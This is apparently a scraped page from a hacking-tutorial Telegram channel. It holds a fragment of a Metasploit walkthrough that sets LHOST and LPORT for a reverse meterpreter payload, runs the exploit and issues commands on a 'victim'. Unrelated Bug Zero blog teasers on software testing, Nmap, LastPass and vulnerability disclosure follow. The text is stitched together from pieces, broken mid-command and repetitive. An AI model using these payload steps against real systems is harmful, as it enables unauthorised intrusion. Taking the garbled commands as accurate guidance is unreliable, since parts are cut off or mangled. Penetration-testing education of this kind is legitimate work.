Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
fuser1 -P <replace Give password 2 times. Here I have given ” admin”as password. Remember to make it complex if you are serious. Set the user as superuser & Create a database Command: createdb msfproj1 --owner=msfuser1 <replaceCommand: exit Start the msfconsole…
tcp
Meterpreter is a state of the art payload. We can have lot of fun with this powerful payload. We will discuss that later.

Now set the LHOST, which is the machine to which the payload has to return connection. Remember to give the full ip address instead of localhost or 127.0.0.1 etc
set LHOST 192.168.0.103
If you want, you can change the listening Port
set LPORT 4445
All set, now
>exploit http://kalilinuxtutorials.com/wp-content/uploads/2015/06/msf2-5.png <figcaptionSetting options & Exploiting

Now that we are in the meterpreter, we have successfully exploited a service and gained access to our victim. There are a whole lot of options you can do with meterpreter. For now lets’ try simple commands.
meterpreter> ifconfig
meterpreter>getuid http://kalilinuxtutorials.com/wp-content/uploads/2015/06/msf2-15.png <figcaptionInside Meterpreter

You can play around with meterpreter, try the help section by issuing “help”. Try for yourself. Step 7: Brief it UP.As this post got a bit lengthy, I have included a screenshot of the procedure very briefly. http://kalilinuxtutorials.com/wp-content/uploads/2015/06/msf2-14.png <figcaptionBrief Procedure
We will see more on advanced vulnerability analysis & finding more exploits in real machines in later tutorials.
Software testing is an essential feature that affects the health and effectiveness of the software. It assures the trustworthiness of…Continue reading on Bug Zero » (https://blog.bugzero.io/the-necessity-of-software-testing-6397174d3744?source=rss------bug_bounty-5)
A free and open-source tool for network discovery and security auditing is called Nmap (“Network Mapper”).Continue reading on Bug Zero » (https://blog.bugzero.io/nmap-the-network-mapper-for-free-security-scanning-533897a8b3a4?source=rss------bug_bounty-5)
Lastpass Password Manager, Has Been Hacked, Again!

What is LastPass?Continue reading on Bug Zero »
Read more...
The Necessity of Software Testing

Software testing is an essential feature that affects the health and effectiveness of the software. It assures the trustworthiness of…Continue reading on Bug Zero »
Read more...
Nmap : The Network Mapper for Free Security Scanning

A free and open-source tool for network discovery and security auditing is called Nmap (“Network Mapper”).Continue reading on Bug Zero »
Read more...
Finding a new vulnerability is thrilling and might be beneficial depending on the vulnerability and company. However, identifying the…Continue reading on Bug Zero » (https://blog.bugzero.io/how-to-informe-an-organization-about-a-security-vulnerability-d683d879856a?source=rss------bug_bounty-5)
How to Informe an Organization about a Security Vulnerability

Finding a new vulnerability is thrilling and might be beneficial depending on the vulnerability and company. However, identifying the…Continue reading on Bug Zero »
Read more...